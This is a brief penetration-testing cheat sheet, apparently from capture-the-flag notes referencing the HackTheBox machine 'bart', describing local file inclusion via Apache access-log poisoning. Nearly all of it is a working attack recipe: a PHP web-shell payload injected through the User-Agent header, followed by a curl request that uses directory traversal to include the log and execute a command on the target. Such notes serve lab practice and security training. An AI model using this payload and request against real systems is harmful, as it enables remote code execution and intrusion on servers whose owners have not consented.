LFI - Using access logs (Log Poisoning)
Steps #
- Ensure you can do LFI on access logs
- Insert this on useragent parameter
<?php echo shell_exec($_GET['cmd']);?>
/burp-changing-user-agent.png)
- Include the logs on next request
curl 'http://10.10.8.194/?view=../../../../var/log/apache2/access.log&ext=&cmd=whoami'
| reference: [Remote Code Execution With LFI | C:\Helich0pper](https://helich0pper.github.io/LFI/) |
References #
- HTB bart